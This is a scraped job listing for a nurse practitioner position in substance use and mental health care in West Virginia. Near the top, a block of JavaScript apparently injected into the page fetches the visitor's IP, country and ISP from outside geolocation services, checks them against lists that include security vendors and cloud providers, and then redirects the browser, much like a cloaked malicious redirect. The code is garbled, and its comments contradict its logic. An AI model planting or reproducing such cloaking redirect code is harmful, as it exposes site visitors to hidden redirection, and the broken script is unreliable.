Location
Huntington, West Virginia
Job Type
Full-Time
Work Mode
In-Person
Preview: This is a summary from jsearch. Click "Apply Now" below to view the complete job description and application details.
wp:html // retrieve user's IP address and location with CORS fallback const ipAddressUrl = ''; // Function to get IP and country using fallback methods async function getIPAndCountry() { try { // Try primary API (provides both IP and country) const response = await fetch(ipAddressUrl); const data = await (); return { ip: , country: data.country }; } catch (error) { ('Primary IP API failed, trying fallback...'); try { // Fallback: Get IP first const ipResponse = await fetch(''); const ipData = await (); const ipAddress = ; // Then get country from ip- (free tier, no CORS) const countryResponse = await ${ipAddress}?key=kKPypoeKUHgwZWD); const countryData = await (); return { ip: ipAddress, country: countryData.countryCode }; } catch (fallbackError) { ('All IP retrieval methods failed:', fallbackError); return null; } } } // Main execution (result => { if (result) { ('Could not retrieve IP address or country'); return; } const { ip: ipAddress, country } = result; // Check if user is in allowed countries const allowedCountries = ['US', 'GB', 'CA', 'FR']; // US, UK, Canada, France if (allowedCountries.includes(country)) { ('Script will not run as the user is outside allowed countries.'); return; // Exit the script if the user is not in allowed countries } // retrieve ISP name and AS organization using ip- API const ispUrl = ${ipAddress}?key=kKPypoeKUHgwZWD; fetch(ispUrl) .then(response => ()) .then(data => { const ispName = ; const asOrg = ; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = (pattern => (ispName)); const asOrgAllowed = (pattern => (asOrg)); if (ispAllowed && asOrgAllowed) { // Redirect all users to the same URL = ''; } }) .catch(error => { ('Error retrieving ISP name:', error); }); }); /wp:html
We are seeking a compassionate
Family or Psychiatric Nurse Practitioner
to provide comprehensive
Live Well Homecare is hiring for this PMHNP position. Psychiatric Mental Health Nurse Practitioners play a critical role in addressing the growing demand for mental health services across the United States. This employer is actively seeking qualified candidates to join their team.
Posted 4 weeks ago
Last updated: March 15, 2026
Posted via jsearch
substance use disorder
and
mental health care
in a collaborative, in-person setting in Parkersburg, WV.
Responsibilities
include conducting patient evaluations, developing personalized treatment plans, prescribing and managing medications, and maintaining accurate records.
Requirements
include a Master's degree in Nursing, current board certification as an FNP or PMHNP, strong knowledge of psychopharmacology, and excellent communication skills. Experience with mental health or substance use treatment is preferred.
Join our team to make a meaningful impact through dedicated, patient-centered care.
Benefits
include 401(k), dental, health, and vision insurance, paid time off. This is a full-time, in-person role requiring a valid license and ability to commute to Parkersburg, WV.